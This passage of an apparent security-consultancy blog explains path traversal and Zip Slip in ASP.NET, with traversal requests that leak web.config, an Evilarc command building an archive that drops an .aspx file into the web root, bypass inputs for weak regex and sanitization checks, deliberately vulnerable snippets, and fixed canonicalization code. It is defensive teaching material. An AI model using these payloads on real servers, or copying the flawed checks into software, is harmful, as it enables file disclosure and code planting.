<li><span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">%c0%af</span> translates to <span style="background: rgb(238 , 238 , 238); border: 0px; box-sizing: border-box; color: #696666; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">\</span></li>
</ul>
</div>
<h3>
Practical Attack</h3>
<div>
<div style="text-align: justify;">
Let us look at two attack examples: the first exploits incorrect validation and sanitization of input data, which is modified to access unexpected resources; the second exploits a well-known weakness of some unzip libraries that do not use secure-by-default logic, allowing (via symlink) files to be unzipped into a parent directory.</div>
</div>
<div>
<br /></div>
<b>Path Traversal</b><br />
As we saw in a previous post, <a href="https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html">From Path Traversal to Source Code in Asp.NET MVC Applications</a>, a Path Traversal can lead to catastrophic consequences, and that is why we consider this vulnerability to be of Medium/High impact.<br />
A request like this:<br />
<div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; color: #555555; font-family: Lato, sans-serif; font-size: 14px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<div style="background: transparent; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
Request:</div>
</div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; color: #555555; font-family: Lato, sans-serif; font-size: 14px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<span style="background: transparent; border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="background: rgb(249, 242, 244); border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="background: transparent; border: 0px; box-sizing: border-box; color: #c7254e; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">GET /download_page?id=<b>content.dat</b> HTTP/1.1</span></span></span><br />
<span style="background: transparent; border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Host: example-mvc-application.minded</span><br />
<span style="background: transparent; border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[...]</span></div>
</div>
</div>
<div>
<div>
<span id="docs-internal-guid-01c57c20-7fff-a1cd-f582-7a9e0589a892">This request can be tampered with using the ../ path sequence to gain access to a configuration file.</span><br />
<br /></div>
</div>
<div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;">
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; color: #555555; font-family: Lato, sans-serif; font-size: 14px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<div style="background: transparent; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
Request:</div>
</div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; color: #555555; font-family: Lato, sans-serif; font-size: 14px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<span style="background: transparent; border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="background: rgb(249, 242, 244); border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="background: transparent; border: 0px; box-sizing: border-box; color: #c7254e; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">GET /download_page?id=<b style="background: transparent; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">..%2f..%2fweb.config</b> HTTP/1.1</span></span></span><br />
<span style="background: transparent; border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Host: example-mvc-application.minded</span><br />
<span style="background: transparent; border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[...]</span><br />
<span style="background: transparent; border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><br /></span></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; color: #555555; font-family: Lato, sans-serif; font-size: 14px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
Response:</div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; color: #555555; font-family: Lato, sans-serif; font-size: 14px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">HTTP/1.1 200 OK<br style="box-sizing: border-box;" />[...]</span></div>
<div style="background: rgb(255, 255, 255); border: 0px; box-sizing: border-box; color: #555555; font-family: Lato, sans-serif; font-size: 14px; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><?xml version="1.0" encoding="utf-8"?></span></div>
<div style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; text-align: left; vertical-align: baseline;">
<div style="font-family: lato, sans-serif; font-size: 14px;">
<span style="border: 0px; box-sizing: border-box; font-family: "courier new" , "courier" , monospace; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="background-color: transparent; border: 0px; box-sizing: border-box; color: #555555; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><configuration></span><br style="box-sizing: border-box;" /><span style="color: #555555;"><span style="background-color: transparent; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> <configSections></span></span><span style="background: rgb(255 , 255 , 255); border: 0px; box-sizing: border-box; color: #555555; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"> </span><span style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral" requirePermission="false" /></span></span></span></div>
<div style="background-color: white; font-family: lato, sans-serif; font-size: 14px;">
<span style="background-color: transparent; border: 0px; box-sizing: border-box; color: #555555; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">[...]</span><br />
<span style="background-color: transparent; border: 0px; box-sizing: border-box; color: #555555; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><br /></span></div>
<div style="background-color: white; color: #555555; font-family: lato, sans-serif; font-size: 14px;">
<span style="background-color: transparent; font-family: "courier new" , "courier" , monospace;"></span></div>
<div style="background-color: white;">
<b>Traversal in Unzip Function</b></div>
<div style="background-color: white;">
<div style="text-align: justify;">
Another exploit through URI normalization abuse is the unzip directory traversal, which can be exploited using a symlink to extract files into parent directories. There are several tools to create such zip files, for example <a href="https://github.com/ptoomey3/evilarc">Evilarc</a>.<br />
An example of its usage can be seen below:</div>
</div>
</div>
</div>
</div>
<pre class="prettyprint">$ python evilarc.py minded.aspx --path inetpub/wwwroot/ --os unix --depth 9 --output-file minded.zip
Creating minded.zip containing ../../../../../../../../../inetpub/wwwroot/minded.aspx
</pre>
And here is the structure of the resulting zip file: <br />
<pre>$ unzip -l minded.zip
Archive:  minded.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     1254  2018-10-15 15:31   ../../../../../../../../../inetpub/wwwroot/minded.aspx
---------                     -------
     1254                     1 file</pre>
<div>
<div>
<div style="text-align: justify;">
Many common zip programs (WinZip, etc.) will prevent extraction of zip files whose embedded files contain paths with directory traversal characters. However, many software development libraries do not include the same protection mechanisms. This year a good list of impacted libraries has been compiled in the <a href="https://github.com/snyk/zip-slip-vulnerability">Zip Slip vulnerability project</a>, which collects all the projects that have been affected by this security issue.</div>
</div>
<div style="color: black; font-family: "Times New Roman"; font-size: medium;">
<br /></div>
</div>
<h3 style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-f111fb38-7fff-73bd-34df-854d0d8acf6a">Vulnerable code</span></h3>
<div>
Here we will see some vulnerable code examples, which use different approaches in an attempt to fix path traversal, but without succeeding.</div>
<div>
<h4>
Incorrect Path Validation</h4>
<div style="text-align: justify;">
When we talk about validation we refer to the verification of the data being submitted, to be sure that it conforms to a rule or set of rules. This could be a simple not-empty check, a complex regular expression, or even a whitelist or blacklist check.</div>
<div style="text-align: justify;">
Talking about paths, whitelist and blacklist checks aren't always possible because sometimes the expected items aren't known before runtime, so it may be a good idea to use a regular expression; but this must be done carefully, because defining a suitable regular expression can be practically difficult, and a wrong one leads to security issues.</div>
<br />
See the <b>vulnerable</b> example below:<br />
<pre class="prettyprint"><b>Regex regex = new Regex(@"([a-zA-Z0-9\s_\\.\-:])+(.dat)");</b>
Match match = regex.Match(location);
if (match.Success){}</pre>
<div style="text-align: justify;">
If we try to access another file which does not have the <i>.dat</i> extension, the application will prevent access to the resource, like this:</div>
<br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">User input : /../web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Server validation : </span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">../web.config -> Fail m</span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">atch regexp!</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Built Path : \Content\defaultContent.dat</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;"><br /></span> <br />
<div style="text-align: justify;">
<span style="background-color: white;">But since the regular expression does not verify that the extension is at the end of the matched string, this check can be bypassed by providing a fake path segment that will be discarded during resource retrieval, because the server performs URI normalization, which can be abused like this:</span></div>
<br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">User input : index.aspx?Page=</span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace; font-size: 14px;">fake.dat/../</span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">../web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Server validation : </span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;"><span style="background-color: #f9f2f4; color: #c7254e;">fake.dat/../</span>../web.config -> Success m</span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">atch regexp!</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Built Path : \Content\<span style="background-color: #f9f2f4; color: #c7254e;">fake.dat/../</span>../web.config</span><br />
<br /><span style="background-color: white;">When the server accesses the resource, the path will be: </span><span style="background-color: #eeeeee; color: #696666;">\web.config</span><span style="background-color: white;">.</span><br />
<h4>
Incorrect Path Sanitization</h4>
<div style="text-align: justify;">
When we talk about sanitization we refer to the manipulation of user input before it is used in the application business logic, that is removing, escaping or replacing parts of the user input in order to avoid wrong application behavior. Talking about paths, a good example of weak sanitization is the removal of the <span style="text-align: justify;">"../" character sequence.</span></div>
See the <b>vulnerable </b>example below:<br />
<pre class="prettyprint"> location = location.Replace(@"..\", ""); //win
if(File.Exists(location))</pre>
<div style="text-align: justify;">
This removes every occurrence of "..\" from the user input, so when a path traversal is provided, it is transformed and sanitized like this:<br />
<br /></div>
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">User input : index.aspx?Page=..\web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Server Sanitization : </span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">..\web.config -> </span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Built Path : \Content\web.config </span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;"><br /></span>
<br />
<div style="text-align: justify;">
But if we just change the backslash ( \ ) to a slash ( / ), it can be exploited again, because servers usually perform URL normalization:<br />
<br /></div>
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">User input : index.aspx?Page=../web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Server Sanitization : </span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">../web.config -> ../</span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Built Path : \Content\../web.config </span><br />
<br />
<div style="text-align: justify;">
One might be tempted to remove them both, but this isn't a solution either, because it can again be bypassed through a nested dot-dot-slash payload, like this:</div>
<br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">User input : index.aspx?Page=...\.\web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Server Sanitization : </span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">.</span><span style="background-color: #f9f2f4; color: #c7254e; font-family: "courier new" , "courier" , monospace; font-size: 14px;">..\</span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">.\web.config -> ..\</span><span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">web.config</span><br />
<span style="background-color: white; color: #555555; font-family: "courier new" , "courier" , monospace; font-size: 14px;">Built Path : \Content\..\web.config </span><br />
<br />
<div style="text-align: justify;">
While the first nested "..\" is removed, the one its removal leaves behind is kept and leads to Path Traversal. <span style="background-color: white;">When the server accesses the resource, the normalized path will be </span><span style="background-color: #eeeeee; color: #696666;">\web.config</span><span style="background-color: white;">.</span></div>
<div style="text-align: justify;">
<h4 style="text-align: start;">
Vulnerable Unzip library</h4>
<div style="text-align: justify;">
When using an unzip library, you need to be careful because there may be security issues caused by vulnerable code; this can be a known or an unknown problem in the library.<br />
For example, if we look at the source of the SharpZipLib library <a href="https://github.com/piksel/SharpZipLib/blob/0.86.0.518/src/Zip/WindowsNameTransform.cs#L130">on a version which was vulnerable to unzip traversal</a>, we can see where the problem was:<br />
<pre class="prettyprint">public string TransformFile(string name)
{
    if (name != null) {
        name = MakeValidName(name, _replacementChar);
        if (_trimIncomingPaths) {
            name = Path.GetFileName(name);
        }
        // This may exceed windows length restrictions.
        // Combine will throw a PathTooLongException in that case.
        if (_baseDirectory != null) {
            <b>name = Path.Combine(_baseDirectory, name);</b>
        }
    } else {
        name = string.Empty;
    }
    return name;
}</pre>
As can be seen, the base path is simply concatenated with the file name taken from the compressed archive. Using parent-directory character sequences in the name of a compressed file is allowed by the zip format, but since not all developers know this, it usually leads to path traversal issues; that is why library methods should be secure by default, disallowing traversal paths on unzip unless explicitly requested.<br />
<br /></div>
</div>
<h3 style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-f111fb38-7fff-73bd-34df-854d0d8acf6a">How to fix</span></h3>
<div>
<div style="text-align: justify;">
Obviously the most effective approach is to map resource locations using indirect object references, so that source (user input) and sink (reading/writing/deleting files or directories) never meet, which rules out these exploits. However, this is not always a suitable solution: it could cost development resources, it might not be supported by the application architecture, or it might simply not be necessary. In other cases we can combine <b>path validation,</b> <b>path sanitization</b> and an <b>absolute path check</b>.</div>
<br />
<div style="text-align: justify;">
The <b>absolute path check</b> means that we verify, starting from the root, that the file we are about to access is the one we were expecting. In other words we segregate resources through path canonicalization, making the path absolute before using it in the application business logic. Canonicalization is a lossless reduction of user input to its simplest equivalent known form. In C# the method "System.IO.Path.GetFullPath" returns the canonicalized path, and we just check whether it starts with an authorized location. </div>
</div>
</div>
<pre class="prettyprint" style="font-weight: 400;">protected string readFile(string location){
<b>
// Validation: anchored at both ends and with the extension dot escaped, so only
// names built from the allowed characters and ending in ".dat" are accepted.
Regex regex = new Regex(@"^[a-zA-Z0-9\s_\\.\-:]+\.dat$");</b> Match match = regex.Match(location);
if (match.Success){
// Absolute path check: canonicalize, then require the authorized prefix.
// The trailing backslash stops "C:\Applications\DocumentsEvil\..." from passing;
// OrdinalIgnoreCase matches the case-insensitive Windows file system.
if(File.Exists(location)<b> && Path.GetFullPath(location).StartsWith(@"C:\Applications\Documents\",StringComparison.OrdinalIgnoreCase)</b>)
{
using (StreamReader reader = new StreamReader(location))
{
return reader.ReadToEnd();
}
}
else
{
return "File not found";
}
}
else
{
return "File name not valid";
}
}</pre>
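<div style="text-align: justify;">
The following example is added here and is not code from the original post. It puts the canonicalization check of the previous paragraph into one helper and uses that helper for both sinks discussed above: a user-supplied file name and each entry of a zip archive (the unzip traversal case). It also shows the two details the snippet above glosses over, the trailing separator on the authorized prefix and the rejection of absolute entry names that Path.Combine would otherwise pass through unchanged. The base directory, the class and method names and the sample file and entry names are assumptions made for the demo; it targets .NET 6 or later.</div>

```csharp
// Added example, not code from the original post: one canonicalization check
// shared by a file-read sink and a zip-extraction sink. Names and paths used in
// the demo are assumptions; it targets .NET 6 or later.
using System;
using System.Collections.Generic;
using System.IO;
using System.IO.Compression;

public static class SafePath
{
    // Resolves `untrusted` against `baseDir` and returns the canonical absolute
    // path, or null when the result would fall outside baseDir.
    public static string Resolve(string baseDir, string untrusted)
    {
        // Absolute names ("C:\...", "\\server\share", "\x") are never accepted:
        // Path.Combine returns a rooted second argument unchanged, which is the
        // same weakness as in the unzip snippet shown above.
        if (string.IsNullOrEmpty(untrusted) || Path.IsPathRooted(untrusted))
            return null;
        if (untrusted.IndexOfAny(Path.GetInvalidPathChars()) >= 0)
            return null;

        // The authorized prefix must end with a separator, otherwise
        // "...\Documents" also accepts "...\DocumentsEvil\x.dat".
        string root = Path.GetFullPath(baseDir);
        if (!root.EndsWith(Path.DirectorySeparatorChar.ToString()))
            root += Path.DirectorySeparatorChar;

        // GetFullPath collapses "." and ".." segments and redundant separators.
        string full = Path.GetFullPath(Path.Combine(root, untrusted));

        // Windows file systems are case-insensitive, Linux ones are not.
        StringComparison cmp = OperatingSystem.IsWindows()
            ? StringComparison.OrdinalIgnoreCase : StringComparison.Ordinal;
        return full.StartsWith(root, cmp) ? full : null;
    }
}

public static class SafeZip
{
    // Extracts only the entries whose canonical target stays inside destDir and
    // returns the names of the entries that were refused (Zip Slip candidates).
    public static List<string> Extract(ZipArchive archive, string destDir)
    {
        var rejected = new List<string>();
        foreach (ZipArchiveEntry entry in archive.Entries)
        {
            // Entry names use '/', Windows paths use '\': normalise before resolving.
            string relative = entry.FullName.Replace('/', Path.DirectorySeparatorChar);
            string target = SafePath.Resolve(destDir, relative);
            if (target == null) { rejected.Add(entry.FullName); continue; }

            if (entry.FullName.EndsWith("/")) { Directory.CreateDirectory(target); continue; }
            Directory.CreateDirectory(Path.GetDirectoryName(target));
            entry.ExtractToFile(target, overwrite: false);
        }
        return rejected;
    }
}

public static class Demo
{
    public static void Main()
    {
        string demoRoot = Path.Combine(Path.GetTempPath(), "safepath-demo");
        if (Directory.Exists(demoRoot)) Directory.Delete(demoRoot, recursive: true);
        string docs = Path.Combine(demoRoot, "Documents");
        Directory.CreateDirectory(docs);

        // Constructed Windows-style inputs: a normal name, a traversal, the
        // sibling-prefix trick and an absolute path. On Linux a backslash is an
        // ordinary file name character, so the middle two resolve inside docs there.
        foreach (string name in new[] { "report.dat", @"..\..\Windows\win.ini",
                                        @"..\DocumentsEvil\x.dat", @"C:\Windows\win.ini" })
            Console.WriteLine($"{name,-26} -> {SafePath.Resolve(docs, name) ?? "REJECTED"}");

        // Constructed archive built in memory: one benign entry and one Zip Slip entry.
        var buffer = new MemoryStream();
        using (var zip = new ZipArchive(buffer, ZipArchiveMode.Create, leaveOpen: true))
        {
            using (var w = new StreamWriter(zip.CreateEntry("notes/readme.txt").Open())) w.Write("hello");
            using (var w = new StreamWriter(zip.CreateEntry("../../evil.txt").Open())) w.Write("pwned");
        }
        buffer.Position = 0;
        using (var zip = new ZipArchive(buffer, ZipArchiveMode.Read))
        {
            List<string> refused = SafeZip.Extract(zip, Path.Combine(demoRoot, "unzipped"));
            Console.WriteLine("refused entries: " + string.Join(", ", refused));
        }
    }
}
```

<div style="text-align: justify;">
Run it with "dotnet run" from a console project. The benign entry lands under the "unzipped" directory, the "../../evil.txt" entry is reported as refused, and the same Resolve helper is what a download handler should call before opening a file named by a request parameter.</div>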
<br />
<h4>
Traversal Unzip</h4>
<div style="text-align: justify;">
Before using an unzip library, check whether it has been found vulnerable to directory traversal during extraction, for example on the <a href="https://github.com/snyk/zip-slip-vulnerability" style="text-align: justify;">Zip Slip vulnerability project page</a><span style="text-align: justify;">, in the <a href="https://www.cvedetails.com/">CVE database</a>, or by testing it as shown above.</span></div>
<span style="text-align: justify;"><br /></span><span style="text-align: justify;"><br /></span><br />
<span style="font-size: 18.72px; font-weight: 700;">Conclusion</span><br />
<br />
Let us summarise the three approaches.<br />
<br />
<table style="border: 1px solid #000; width: 100%;"> <tbody>
<tr> <th style="width: 20%;"></th> <th style="width: 40%;"><div style="text-align: left;">
Functionality</div>
</th> <th style="width: 40%;"><div style="text-align: left;">
Risks</div>
</th> </tr>
<tr> <td>Validation<br />
<br /></td> <td>Rejects input that does not respect the chosen rules<br />
<br /></td> <td>A rule set that is too permissive lets through characters that enable other issues: XSS, SQL injection, even log injection<br />
<br /></td> </tr>
<tr> <td>Sanitization<br />
<br /></td> <td>Removes unwanted characters before the application uses the input</td> <td>If not based on an allow-list, unexpected characters may remain</td> </tr>
<tr> <td>Absolute Path Check<br />
<br /></td> <td>Uses canonicalization to verify that the resolved file is inside the authorized location</td> <td>Confines the file access only: if the input is not also validated and sanitized it may still lead to other security issues</td> </tr>
</tbody></table>
<br />
<div style="text-align: justify;">
Security is not a static condition, nor a destination to be reached, but a continuous process, so approaching the fix of a path traversal with a single method can be simplistic and often not conclusive. The best way is therefore a security-oriented mentality that involves the different layers of the development process (you can check how far this orientation has spread in your company with the new <a href="https://www.mindedsecurity.com/index.php/services/consulting/swsecurity-5d-framework-survey">Minded Security Software Security 5D framework</a>), but speaking from a technical point of view, validation, sanitization and canonicalization are three methods that should be used together to minimize security risks.</div>
<br />
<br />
<span style="font-size: 18.72px; font-weight: 700;">References</span><br />
<ul>
<li>https://www.owasp.org/index.php/Path_Traversal</li>
<li>http://cwe.mitre.org/data/definitions/22.html</li>
<li>https://www.owasp.org/index.php/File_System#Path_traversal</li>
<li>https://unicode-search.net/unicode-namesearch.pl?term=SLASH</li>
</ul>
<br />
<br />
<b>Author: Enrico Aleandri</b><br />Giorgio Fedon http://www.blogger.com/profile/17285473210424014740 noreply@blogger.com 2<br />tag:blogger.com,1999:blog-7122745763234660283.post-4763117556629568058 2018-10-09T08:30:00.002-07:00 2019-03-02T01:01:19.157-08:00<br />From Path Traversal to Source Code in Asp.NET MVC Applications<h3>
Introduction</h3>
<div style="text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsHIkRKLrs3XbNHW0sut9RbCya5Y54zwOXlQk4Qf_p-zZszXrne_HON_sdL4qzF-ZlzkgTqQZVtCEH0WDaiJK_Wo_7N9X5VutTEuWZvdp9POoX04n0AO_lReMaOXnUHHtw3xPJitLUdW9W/s1600/1.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="550" data-original-width="500" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsHIkRKLrs3XbNHW0sut9RbCya5Y54zwOXlQk4Qf_p-zZszXrne_HON_sdL4qzF-ZlzkgTqQZVtCEH0WDaiJK_Wo_7N9X5VutTEuWZvdp9POoX04n0AO_lReMaOXnUHHtw3xPJitLUdW9W/s320/1.png" width="290" /></a>Model-View-Controller web applications may be difficult to pentest, since they depend strongly, for almost every aspect, on the technology they are developed and deployed with. From the attacker's perspective, interacting with a complex multi-layer web application means dealing with very technology-dependent configuration files and implementations; classic web applications (such as WebForms), on the contrary, have a more traditional and simple structure, where looking for interesting data and handlers may be easier. </div>
<div>
<br /></div>
<div style="text-align: justify;">
In this post we will describe a series of steps, based on real world experience, to exploit a Path Traversal vulnerability and reach a full disclosure of source code, by downloading and decompiling DLLs of a Model-View-Controller application within .Net MVC architecture and <a href="https://www.c-sharpcorner.com/article/learn-about-razor-view-engine/" target="_blank">Razor</a> as the View Engine.<br />
<br /></div>
<h3>
Prerequisite</h3>
<div style="text-align: justify;">
A Path Traversal vulnerability is present on the target application, and the standard web.config file can be downloaded.</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<b>Note: </b>most recent IIS versions and, in general, hardened installations, do not allow web handlers to retrieve files outside their sandbox or scope (i.e. the root folder of the web application, for example c:\inetpub\wwwroot\application_name\)<br />
<br />
<h3>
Main structure</h3>
<div>
<div style="text-align: justify;">
As in any .Net application, an MVC application has a web.config file, where the "<span style="font-family: "courier new" , "courier" , monospace;">assemblyIdentity</span>" XML tags (one per <span style="font-family: "courier new" , "courier" , monospace;">dependentAssembly</span> with a binding redirect) name the assemblies the application depends on; together with the "<span style="font-family: "courier new" , "courier" , monospace;">type=</span>" attributes of the configuration sections, they give an inventory of the binaries deployed in /bin.</div>
<div style="text-align: justify;">
<br />
Request:</div>
</div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: #f9f2f4;"><span style="color: #c7254e;">GET /download_page?id=<b>..%2f..%2fweb.config</b> HTTP/1.1</span></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">Host: example-mvc-application.minded</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;">[...]</span></span></div>
<div>
<br />
Response:</div>
<div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;">HTTP/1.1 200 OK<br /> [...]</span></div>
<div>
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"><?xml version="1.0" encoding="utf-8"?></span></div>
<div>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"><configuration></span><br /><span style="background-color: white;"> <configSections></span><br /><span style="color: #c7254e;"><span style="background-color: white;"> </span><span style="background-color: #f9f2f4;"><section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral" requirePermission="false" /></span></span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> </configSections></span><br /><span style="background-color: white;"> <appSettings></span><br /><span style="background-color: white;"> <add key="webpages:Version" value="3.0.0.0" /></span><br /><span style="background-color: white;"> <add key="webpages:Enabled" value="false" /></span><br /><span style="background-color: white;"> <add key="ClientValidationEnabled" value="true" /></span><br /><span style="background-color: white;"> <add key="UnobtrusiveJavaScriptEnabled" value="true" /></span><br /><span style="background-color: white;"> </appSettings></span><br /><span style="background-color: white;"> <system.web></span><br /><span style="background-color: white;"> <authentication mode="None" /></span><br /><span style="background-color: white;"> <compilation debug="true" targetFramework="4.6.1" /></span><br /><span style="background-color: white;"> <httpRuntime targetFramework="4.6.1" /></span><br /><span style="background-color: white;"> </system.web></span><br /><span style="background-color: white;"> <system.webServer></span><br /><span style="background-color: white;"> <modules></span><br /><span style="background-color: white;"> <remove name="FormsAuthentication" /></span><br /><span style="background-color: white;"> </modules></span><br /><span style="background-color: white;"> </system.webServer></span><br /><span style="background-color: white;"> <runtime></span><br /><span style="background-color: white;"> <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1"></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="background-color: white; color: #c7254e;"> </span><span style="background-color: #f9f2f4; color: #c7254e;"><<b>assemblyIdentity</b> name="Microsoft.Owin.Security" /></span></span><br />
<span style="background-color: white; font-family: "courier new" , "courier" , monospace;"> <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" /></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"> </dependentAssembly></span><br /><span style="background-color: white;"> <dependentAssembly></span><br /><span style="color: #c7254e;"><span style="background-color: white;"> </span><span style="background-color: #f9f2f4;"><</span><b style="background-color: #f9f2f4;">assemblyIdentity</b><span style="background-color: #f9f2f4;"> name="Microsoft.Owin.Security.OAuth" /></span></span></span><br />
